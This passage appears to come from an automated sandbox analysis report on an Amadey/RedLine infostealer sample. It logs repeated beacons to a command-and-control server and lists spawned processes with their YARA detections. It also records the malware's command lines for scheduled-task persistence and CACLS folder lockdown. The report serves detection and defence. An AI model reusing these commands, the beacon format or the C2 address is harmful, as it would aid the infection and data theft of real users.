                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:48.913948059 CET | 280 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            92 | 192.168.2.4 | 49787 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:49.088687897 CET | 280 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:49.154936075 CET | 281 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            93 | 192.168.2.4 | 49788 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:49.340408087 CET | 281 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:49.405584097 CET | 282 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            94 | 192.168.2.4 | 49789 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:49.576297045 CET | 282 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:49.643573999 CET | 283 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            95 | 192.168.2.4 | 49790 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:49.827327013 CET | 283 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:49.894879103 CET | 284 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            96 | 192.168.2.4 | 49791 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:50.073107958 CET | 284 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:50.140377045 CET | 285 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            97 | 192.168.2.4 | 49792 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:50.312285900 CET | 285 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:50.376621962 CET | 286 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            98 | 192.168.2.4 | 49793 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:50.723015070 CET | 286 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:50.787786961 CET | 287 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            99 | 192.168.2.4 | 49794 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:50.997870922 CET | 287 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:51.061672926 CET | 288 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Target ID:0
                            Start time:17:36:18
                            Start date:08/02/2023
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\file.exe
                            Imagebase:0x10e0000
                            File size:582656 bytes
                            MD5 hash:3C86571F94AE2A9B196C945890C4D48A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low

                            Target ID:1
                            Start time:17:36:18
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            Imagebase:0xa70000
                            File size:391680 bytes
                            MD5 hash:243D9E7FA50F53508036E1579B603367
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 51%, ReversingLabs
                            Reputation:low

                            Target ID:2
                            Start time:17:36:19
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe
                            Imagebase:0x400000
                            File size:371200 bytes
                            MD5 hash:7A0C89DA78468AC421B2B1CD1A36DEE9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.415154394.0000000000607000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 36%, ReversingLabs
                            Reputation:low

                            Target ID:3
                            Start time:17:36:31
                            Start date:08/02/2023
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Imagebase:0x7ff7fc1d0000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:4
                            Start time:17:36:39
                            Start date:08/02/2023
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Imagebase:0x7ff7fc1d0000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:7
                            Start time:17:37:07
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Imagebase:0x1f0000
                            File size:11264 bytes
                            MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 82%, ReversingLabs
                            Reputation:moderate

                            Target ID:8
                            Start time:17:37:20
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Imagebase:0x1370000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000008.00000000.444881236.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 81%, ReversingLabs

                            Target ID:9
                            Start time:17:37:21
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000009.00000000.446489289.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.834626616.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000009.00000002.834330424.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 81%, ReversingLabs

                            Target ID:10
                            Start time:17:37:21
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Imagebase:0xbc0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:11
                            Start time:17:37:21
                            Start date:08/02/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:12
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:13
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:14
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:15
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "mnolyk.exe" /P "user:N"
                            Imagebase:0xcf0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:16
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                            Imagebase:0xcf0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:17
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:18
                            Start time:17:37:23
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "..\4b9a106e76" /P "user:N"
                            Imagebase:0xcf0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:19
                            Start time:17:37:23
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000013.00000000.450697685.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000013.00000002.451269241.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Target ID:20
                            Start time:17:37:23
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                            Imagebase:0xcf0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:21
                            Start time:17:37:24
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Imagebase:0x2e0000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:22
                            Start time:17:38:01
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000016.00000000.531737560.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000016.00000002.531952699.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Target ID:26
                            Start time:17:39:00
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001A.00000002.658498410.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001A.00000000.658223943.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Target ID:27
                            Start time:17:40:00
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001B.00000000.786833097.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001B.00000002.787454951.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                              Execution Graph

                              Execution Coverage:26.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:27%
                              Total number of Nodes:967
                              Total number of Limit Nodes:42
